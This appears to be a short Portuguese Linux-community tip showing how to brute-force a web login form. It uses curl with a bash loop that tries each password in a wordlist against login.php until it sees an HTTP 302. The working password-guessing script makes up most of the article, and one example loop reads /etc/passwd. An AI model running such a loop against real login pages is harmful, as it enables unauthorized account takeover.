cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.406 ]
cURL - Brute-force em aplicações Web
Primeiro, iremos ver algumas opções de linha de comando do cURL:
curl -h
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.
Entendo as opções:
1. As opções "-s" e "-o" são para não exibirem o conteúdo HTML do request; iremos mandar essa saída de comando para o /dev/null.
2. O comando "-F" funciona para enviar os parâmetros através de "POST request".
Exemplo:
curl -F teste=enviando-post localhost/teste.php
Exemplo:
curl -w "%{http_code}" localhost/lol
Fazendo o ataque
Agora iremos proceder para o ataque de brute-force. Primeiro, temos que saber quais os nomes dos campos que iremos enviar pelo POST request.Exemplo: login, password, log, passwd, user, etc.
Tendo essas informações, iremos transformar a saída do comando em uma variável.
Exemplo:
curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php
login=$(curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php)
Agora, para proceder com o ataque de "word list" iremos usar o "for" para ler um arquivo linha por linha.
Exemplo:
for i in `cat /etc/passwd`;do echo $i; done
Nosso comando final ficará assim:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Espero que tenham gostado da dica.
[]'s
Dica também publicada em:
elementary OS - Plank exibindo ícones duplicados do Google Chrome
recordMyDesktop - Como codificar vídeo durante gravação
Instalando Cinnamon no Ubuntu 18.04 LTS
Meu programa para download: Calculadora de décimo terceiro salário
Reexecutando comandos do console
Comando sed para formatar CNPJ - formatos antigo e novo
Letras Bacanas no seu Shell Script sem Figlet
Clonar HDs em máquinas Windows 7 via servidor openSUSE
Contador de Palavras no Terminal
Telinha simples de loading.... em Shell Script
Nenhum coment�rio foi encontrado.
Patrocínio
Destaques
Artigos
Aprenda a Gerenciar Permissões de Arquivos no Linux
Como transformar um áudio em vídeo com efeito de forma de onda (wave form)
Como aprovar Pull Requests em seu repositório Github via linha de comando
Dicas
Visualizar arquivos em formato markdown (ex.: README.md) pelo terminal
Dando - teoricamente - um gás no Gnome-Shell do Arch Linux
Como instalar o Google Cloud CLI no Ubuntu/Debian
Mantenha seu Sistema Leve e Rápido com a Limpeza do APT!
Procurando vídeos de YouTube pelo terminal e assistindo via mpv (2025)
Tópicos
Alguém já usou o framework Avalonia para desenvolver interfaces de usu... (4)
Ajuda Pra Melhoria do NFTABLES. (8)
Sinto uma leve lentidão ao arrastar, miniminizar e restauras as janela... (2)
Pastas da raiz foram para a área de trabalho [RESOLVIDO] (7)
Top 10 do mês
-
Xerxes
1° lugar - 89.749 pts -
Fábio Berbert de Paula
2° lugar - 69.730 pts -
Mauricio Ferrari
3° lugar - 20.420 pts -
Alberto Federman Neto.
4° lugar - 18.521 pts -
Buckminster
5° lugar - 18.425 pts -
Daniel Lara Souza
6° lugar - 17.226 pts -
edps
7° lugar - 16.681 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
8° lugar - 15.962 pts -
Diego Mendes Rodrigues
9° lugar - 14.421 pts -
Andre (pinduvoz)
10° lugar - 13.231 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
